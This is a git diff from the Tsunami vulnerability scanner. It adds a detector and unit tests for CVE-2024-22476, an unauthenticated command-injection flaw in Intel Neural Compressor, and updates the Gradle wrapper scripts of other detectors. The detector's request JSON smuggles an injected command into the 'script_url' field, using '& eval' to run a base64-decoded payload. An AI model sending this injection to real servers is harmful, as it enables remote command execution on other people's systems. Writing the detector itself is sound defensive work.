.setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build(); + + return this.payloadGenerator.generate(config); + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2024_22476")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2024-22476 Intel Neural Compressor RCE") + .setDescription( + "The Intel Neural Compressor has a component called Neural Solution that brings" + + " the capabilities of Intel Neural Compressor as a service. The" + + " task/submit API in the Neural Solution webserver is vulnerable to an" + + " unauthenticated remote code execution (RCE) attack. The" + + " script_urlparameter in the body of the POST request for this API is not" + + " validated or filtered on the backend. As a result, attackers can" + + " manipulate this parameter to remotely execute arbitrary commands.") + .setRecommendation( + "You can upgrade your Intel Neural Compressor instances to 2.5.0 or later.")) + .build(); + } +} diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/resources/com/google/tsunami/plugins/detectors/cves/cve202422476/task_request.json b/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/resources/com/google/tsunami/plugins/detectors/cves/cve202422476/task_request.json new file mode 100644 index 000000000..0eb8db38e --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/resources/com/google/tsunami/plugins/detectors/cves/cve202422476/task_request.json @@ -0,0 +1,10 @@ +{ + "script_url": "https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification & eval \"$(echo {{CALLBACK_PAYLOAD}} | base64 --decode)\"", + "optimized": "False", + "arguments": [ + "--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result" + ], + "approach": "static", + "requirements": [], + "workers": 1 +} diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476VulnDetectorTest.java b/community/detectors/intel_neural_compressor_cve_2024_22476/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476VulnDetectorTest.java new file mode 100644 index 000000000..0ad5aa8ca --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476VulnDetectorTest.java @@ -0,0 +1,180 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.cves.cve202422476; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link Cve202422476VulnDetector}. */ +@RunWith(JUnit4.class) +public class Cve202422476VulnDetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2022-05-23T00:00:00.00Z")); + private MockWebServer mockWebServer; + private MockWebServer mockCallbackServer; + private NetworkService targetNetworkService; + private TargetInfo targetInfo; + + @Inject private Cve202422476VulnDetector detector; + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + mockCallbackServer = new MockWebServer(); + mockCallbackServer.start(); + + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setCallbackServer(mockCallbackServer).build(), + new Cve202422476DetectorBootstrapModule()) + .injectMembers(this); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws IOException { + // It is a blind RCE, body is not important. This is a part of a valid response. + startMockWebServer(true); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2024_22476")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2024-22476 Intel Neural Compressor RCE") + .setRecommendation( + "You can upgrade your Intel Neural Compressor instances to 2.5.0 or" + + " later.") + .setDescription( + "The Intel Neural Compressor has a component called Neural Solution" + + " that brings the capabilities of Intel Neural Compressor as a" + + " service. The task/submit API in the Neural Solution webserver" + + " is vulnerable to an unauthenticated remote code execution (RCE)" + + " attack. The script_urlparameter in the body of the POST request" + + " for this API is not validated or filtered on the backend. As a" + + " result, attackers can manipulate this parameter to remotely" + + " execute arbitrary commands.")) + .build()); + assertThat(mockWebServer.getRequestCount()).isEqualTo(2); + assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln() throws IOException { + startMockWebServer(false); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + assertThat(mockWebServer.getRequestCount()).isEqualTo(2); + } + + private void startMockWebServer(boolean isVulnerableServer) throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + + @Override + public MockResponse dispatch(RecordedRequest request) { + switch (request.getPath()) { + case "/": + return new MockResponse() + .setResponseCode(200) + .setBody("{\"message\":\"Welcome to Neural Solution!\"}"); + case "/task/submit/": + if (isVulnerableServer) { + return new MockResponse() + .setResponseCode(200) + .setBody( + "{\"status\":\"successfully\",\"task_id\":\"065d95dd70524cb2baa743def3ff7036\",\"msg\":\"Task" + + " submitted successfully\"}"); + } else { + return new MockResponse() + .setResponseCode(422) + .setBody("{\"detail\":\"Invalid task\"}"); + } + default: + return new MockResponse() + .setResponseCode(404) + .setBody("{\"detail\":\"Not Found\"}"); + } + } + }; + mockWebServer.setDispatcher(dispatcher); + mockWebServer.start(); + mockWebServer.url("/"); + targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .addSupportedHttpMethods("POST") + .addSupportedHttpMethods("GET") + .build(); + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + } +} diff --git a/community/detectors/jenkins_arbitrary_file_read_cve_2024_23897/gradle/wrapper/gradle-wrapper.properties b/community/detectors/jenkins_arbitrary_file_read_cve_2024_23897/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/community/detectors/jenkins_arbitrary_file_read_cve_2024_23897/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/jenkins_arbitrary_file_read_cve_2024_23897/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.jar b/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.properties b/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/jira_cve_2022_0540/gradlew b/community/detectors/jira_cve_2022_0540/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/jira_cve_2022_0540/gradlew +++ b/community/detectors/jira_cve_2022_0540/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/jira_cve_2022_0540/gradlew.bat b/community/detectors/jira_cve_2022_0540/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/jira_cve_2022_0540/gradlew.bat +++ b/community/detectors/jira_cve_2022_0540/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.jar b/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.properties b/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/laravel_cve_2021_3129/gradlew b/community/detectors/laravel_cve_2021_3129/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/laravel_cve_2021_3129/gradlew +++ b/community/detectors/laravel_cve_2021_3129/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 